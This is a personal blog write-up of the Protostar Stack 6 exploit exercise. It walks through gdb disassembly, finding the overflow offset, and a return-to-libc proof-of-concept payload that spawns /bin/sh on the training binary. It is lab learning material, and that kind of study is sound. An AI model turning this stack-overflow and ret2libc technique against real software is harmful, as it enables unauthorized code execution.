Exploit Exercises - Protostar Stack 6

It is free time - I had some time to play exploit-exercises. Today i play at stack level 6. I learned some experience for me, with return to lib.
Use gdb, disassembly:
#gdb -q /opt/protostar/bin/stack6 
(gdb) disas main
Dump of assembler code for function main:
:    push   %ebp
:    mov    %esp,%ebp
:    and    $0xfffffff0,%esp
:    call   0x8048484
:   mov    %ebp,%esp
:   pop    %ebp
:   ret  
End of assembler dump.
 (gdb) disas getpath
Dump of assembler code for function getpath:
0x08048484 : push   %ebp
0x08048485 : mov    %esp,%ebp
0x08048487 : sub    $0x68,%esp
0x0804848a : mov    $0x80485d0,%eax
0x0804848f :        mov    %eax,(%esp)
0x08048492 :        call   0x80483c0
0x08048497 :        mov    0x8049720,%eax
0x0804849c :        mov    %eax,(%esp)
0x0804849f :        call   0x80483b0
0x080484a4 :        lea    -0x4c(%ebp),%eax
0x080484a7 :        mov    %eax,(%esp)
0x080484aa :        call   0x8048380
0x080484af :        mov    0x4(%ebp),%eax
0x080484b2 :        mov    %eax,-0xc(%ebp)
0x080484b5 :        mov    -0xc(%ebp),%eax
0x080484b8 :        and    $0xbf000000,%eax
0x080484bd :        cmp    $0xbf000000,%eax
0x080484c2 :        jne    0x80484e4
0x080484c4 :        mov    $0x80485e4,%eax
0x080484c9 :        mov    -0xc(%ebp),%edx
0x080484cc :        mov    %edx,0x4(%esp)
0x080484d0 :        mov    %eax,(%esp)
0x080484d3 :        call   0x80483c0
0x080484d8 :        movl   $0x1,(%esp)
0x080484df :        call   0x80483a0 <_exit plt="">
0x080484e4 :        mov    $0x80485f0,%eax
0x080484e9 :       lea    -0x4c(%ebp),%edx
0x080484ec :       mov    %edx,0x4(%esp)
0x080484f0 :       mov    %eax,(%esp)
0x080484f3 :       call   0x80483c0
0x080484f8 :       leave
0x080484f9 :       ret    

Set breakpoint at call getpath and getpath+116, before return to main (overflowed)
(gdb) info breakpoints 
Num     Type           Disp Enb Address    What
1       breakpoint     keep y   0x08048500 in main at stack6/stack6.c:27
        breakpoint already hit 1 time
2       breakpoint     keep y   0x080484f8 in getpath at stack6/stack6.c:23
        breakpoint already hit 1 time
Generate paypoad, use msftool to get padding, it is 80. 
python -c 'print "A"*80+ "BBBB"'
crashed, eip point to 0x42424242, controll eip done!
When review source code, u will see code check return address not in 0xbfxxxxxxx. So to exploit it, u need use return to lib (Many tutorial use rop, i thinks it not need).
p system
p exit 
to get function address
this is payload
Set string to parameter os system function: export SHELL2='/bin/sh'. Then get this address of environment and add 7 (len("SHELL2=")=7).
| "A"*80 to fill | system() address |  exit() address | /bin/sh address |
use ;cat | stack6 trick to hold shell after open.
This is poc use environment variable: (python -c 'print "A"*80+"\xb0\xff\xec\xb7"+"\xc0\x60\xec\xb7"+"\xc8\xf6\xff\xbf"+"/bin/sh"';cat) | /opt/protostar/bin/stack6
Then, i need use /bin/sh in poc. So i choose put /bin/sh in last of poc
| "A"*80 to fill | system() address |  exit() address | /bin/sh address | /bin/sh string |
Use gdb dump, add 0x30 to real memory.
This is poc:
(python -c 'print "A"*80+"\xb0\xff\xec\xb7"+"\xc0\x60\xec\xb7"+"\xc8\xf6\xff\xbf"+"/bin/sh"';cat) | /opt/protostar/bin/stack6

Thanks for reading
Security Research
SecurityLab - Linux Lab -- Window and Cisco Lab
to be continued - I will update more.


Popular posts from this blog

Python - Multithread to read one file

Install Xposed Inspector and Frida on Genymotion

OpenCA tutorial